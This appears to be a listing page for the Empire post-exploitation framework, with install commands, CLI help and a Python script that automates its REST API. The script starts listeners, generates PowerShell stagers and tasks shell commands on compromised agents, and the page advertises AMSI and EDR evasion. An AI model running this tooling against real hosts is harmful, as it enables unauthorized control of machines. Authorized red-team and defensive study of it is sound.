Empire: PowerShell Post-Exploitation Framework

Last Release: 06/23/2022     Last Commit: 06/23/2022

Empire is a post-exploitation framework that combines PowerShell and Python agents under one command-and-control server, from which post-exploitation modules such as keyloggers or Mimikatz are pushed to compromised hosts. Agent-to-server traffic is encrypted, and listeners, stagers and modules are pluggable, so the framework can be adapted to a given engagement rather than used as a fixed toolkit.

PowerShell Empire premiered at BSidesLV in 2015 and Python EmPyre premiered at HackMiami 2016. BC-Security presented updates to further evade Microsoft Antimalware Scan Interface (AMSI) and JA3/S signatures at DEF CON 27.

After entering the main menu, the user sees the number of active agents, listeners and loaded modules. The first step is normally to set up a listener through the listener management menu. Next, the user generates a stager for that listener (DLLs, Office macros, one-liners and more) and runs it on a target; each successful callback shows up as an agent. From the agents menu the user can see which compromised hosts are still checking in, run commands through an individual agent and, lastly, execute modules against selected agents.

Features:

  • A pure-PowerShell 2.0 Windows agent
  • Python 3.x agents for Linux and macOS
  • Post-exploitation modules ranging from keyloggers to Mimikatz
  • Evasion features for AV/EDR, including AMSI bypasses

Supported Platforms:

  • Linux
  • Windows

Requirements:

  • PowerShell
  • Python 3.x

Install Empire

Linux

Clone the GitHub repo:

$ git clone https://github.com/BC-SECURITY/Empire.git

Navigate to the working directory and install:

$ cd Empire
$ sudo ./setup/install.sh

Kali Linux

Run the following command:

$ sudo apt install powershell-empire

Docker

Using a pre-built Docker image (replace {version} with a release tag from Docker Hub):

$ docker pull bcsecurity/empire:{version}
$ docker run -it bcsecurity/empire:{version}

# with persistent storage
$ docker pull bcsecurity/empire:{version}
$ docker create -v /empire --name data bcsecurity/empire:{version}
$ docker run -it --volumes-from data bcsecurity/empire:{version}

# if you prefer to be dropped into bash instead of directly into empire
$ docker run -it --volumes-from data bcsecurity/empire:{version} /bin/bash

Usage

Enter the following commands (Empire 3.x; from 4.0 the server and client are started separately with ./ps-empire server and ./ps-empire client):

$ cd Empire
$ ./empire

Different switches within Empire

Use -h to list all available options:

$ ./empire -h
 usage: empire [-h] [--debug [DEBUG]] [-s [STAGER]]
               [-o [STAGER_OPTIONS [STAGER_OPTIONS ...]]] [-l [LISTENER]] [-v]
               [--rest] [--restport [RESTPORT]] [--headless]
               [--username [USERNAME]] [--password [PASSWORD]]
  
 optional arguments:
   -h, --help            show this help message and exit
   --debug [DEBUG]       Debug level for output (default of 1).
   -s [STAGER], --stager [STAGER]
                         Specify a stager to generate. Lists all stagers if
                         none is specified.
   -o [STAGER_OPTIONS [STAGER_OPTIONS ...]], --stager-options [STAGER_OPTIONS [STAGER_OPTIONS ...]]
                         Supply options to set for a stager in OPTION=VALUE
                         format. Lists options if nothing is specified.
   -l [LISTENER], --listener [LISTENER]
                         Display listener options. Displays all listeners if
                         nothing is specified.
   -v, --version         Display current Empire version.
   --rest                Run the Empire RESTful API.
   --restport [RESTPORT]
                         Port to run the Empire RESTful API on.
   --headless            Run Empire and the RESTful API headless without the
                         usual interface.
   --username [USERNAME]
                         Start the RESTful API with the specified username
                         instead of pulling from empire.db
   --password [PASSWORD]
                         Start the RESTful API with the specified password
                         instead of pulling from empire.db 
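The listener, stager, agent and module workflow described under the main menu, and the headless --rest mode that the switches above expose, can be scripted instead of driven by hand. The script below is an added example, not Empire's own code: the endpoint paths and the request and response shapes are assumed from the Empire 3.x REST API and should be checked against the version you installed, and FakeEmpire is a constructed stub standing in for the server so the script runs without a live instance.

```python
"""Drive a headless Empire 3.x server over its REST API (added example, not
Empire's own code).  Assumes ./empire --rest --headless --username U --password P
and these 3.x endpoints, which are assumptions to check against your version:
  POST /api/admin/login {username,password} -> {token}
  POST /api/listeners/http {Name,Host,Port} -> {success} | {error}
  POST /api/stagers {StagerName,Listener} -> {<StagerName>: {..., Output}}
  GET  /api/agents -> {agents:[...]}
  POST /api/agents/<name>/shell {command} -> {success,taskID}
Every call after login carries ?token=<token>.  The HTTP layer is injected so
the same workflow runs offline against the constructed FakeEmpire stub."""
import json
import ssl
import urllib.request
from typing import Callable, Dict, List, Optional

Transport = Callable[[str, str, Optional[dict]], dict]  # (method, url, body) -> JSON


def urllib_transport(verify_tls: bool = True) -> Transport:
    """Real transport.  The API defaults to https://127.0.0.1:1337 with a
    self-signed cert, so verify_tls=False is needed for a loopback lab box."""
    ctx = ssl.create_default_context()
    if not verify_tls:
        ctx.check_hostname, ctx.verify_mode = False, ssl.CERT_NONE

    def send(method: str, url: str, body: Optional[dict]) -> dict:
        data = json.dumps(body).encode() if body is not None else None
        req = urllib.request.Request(url, data=data, method=method,
                                     headers={"Content-Type": "application/json"})
        with urllib.request.urlopen(req, context=ctx, timeout=30) as resp:
            return json.loads(resp.read().decode())
    return send


class EmpireClient:
    """Listener -> stager -> agent -> task, the same flow as the interactive menu."""

    def __init__(self, base_url: str, transport: Transport):
        self.base, self.send, self.token = base_url.rstrip("/"), transport, None

    def _url(self, path: str) -> str:
        return self.base + path + (f"?token={self.token}" if self.token else "")

    def _call(self, method: str, path: str, body: Optional[dict] = None) -> dict:
        resp = self.send(method, self._url(path), body)
        if "error" in resp:          # assumed: failures come back as {"error": "..."}
            raise RuntimeError(f"{method} {path}: {resp['error']}")
        return resp

    def login(self, username: str, password: str) -> str:
        self.token = self._call("POST", "/api/admin/login",
                                {"username": username, "password": password})["token"]
        return self.token

    def start_http_listener(self, name: str, host: str, port: int) -> str:
        return self._call("POST", "/api/listeners/http",
                          {"Name": name, "Host": host, "Port": str(port)})["success"]

    def generate_stager(self, listener: str, stager: str = "multi/launcher") -> str:
        return self._call("POST", "/api/stagers",
                          {"StagerName": stager, "Listener": listener})[stager]["Output"]

    def list_agents(self) -> List[Dict]:
        return self._call("GET", "/api/agents")["agents"]

    def run_shell(self, agent: str, command: str) -> int:
        return self._call("POST", f"/api/agents/{agent}/shell", {"command": command})["taskID"]


class FakeEmpire:
    """Constructed stand-in for the server; responses mirror the assumed shapes."""
    TOKEN = "deadbeef"

    def __init__(self):
        self.listeners: Dict[str, dict] = {}
        self.tasks: List[tuple] = []

    def __call__(self, method: str, url: str, body: Optional[dict]) -> dict:
        path, _, query = url.partition("?")
        path = path.split("://", 1)[-1].split("/", 1)[1]       # drop scheme and host
        if path == "api/admin/login":
            ok = body == {"username": "empireadmin", "password": "s3cret"}
            return {"token": self.TOKEN} if ok else {"error": "bad credentials"}
        if query != f"token={self.TOKEN}":
            return {"error": "not authenticated"}
        if path == "api/listeners/http":
            if body["Name"] in self.listeners:
                return {"error": "listener name in use"}
            self.listeners[body["Name"]] = body
            return {"success": "listener http successfully started"}
        if path == "api/stagers":
            if body["Listener"] not in self.listeners:
                return {"error": "unknown listener"}
            return {body["StagerName"]: {"Output": f"powershell -noP -sta -w 1 -enc <{body['Listener']}>"}}
        if path == "api/agents":
            return {"agents": [{"name": "A1B2C3D4", "hostname": "WS01", "username": "CORP\\alice"}]}
        if path.startswith("api/agents/") and path.endswith("/shell"):
            self.tasks.append((path.split("/")[2], body["command"]))
            return {"success": True, "taskID": len(self.tasks)}
        return {"error": f"no route {method} {path}"}


def demo(transport: Transport, base: str = "https://127.0.0.1:1337") -> dict:
    """Log in, start a listener, cut a launcher, list agents, task the first one."""
    c = EmpireClient(base, transport)
    c.login("empireadmin", "s3cret")
    c.start_http_listener("http", "https://127.0.0.1", 443)
    launcher = c.generate_stager("http")
    agents = c.list_agents()
    return {"launcher": launcher, "agents": agents,
            "task": c.run_shell(agents[0]["name"], "whoami")}


if __name__ == "__main__":
    print(json.dumps(demo(FakeEmpire()), indent=2))
    # against a live lab server: demo(urllib_transport(verify_tls=False))
```

Run it as-is to exercise the stub; point demo() at urllib_transport(verify_tls=False) for a server started with ./empire --rest --headless on the loopback address. The API is guarded only by the username/password pair that is pulled from empire.db or passed on the command line (where it is visible to other local users in the process list), so change the shipped credentials and keep the REST port bound to localhost or reachable only through an SSH tunnel.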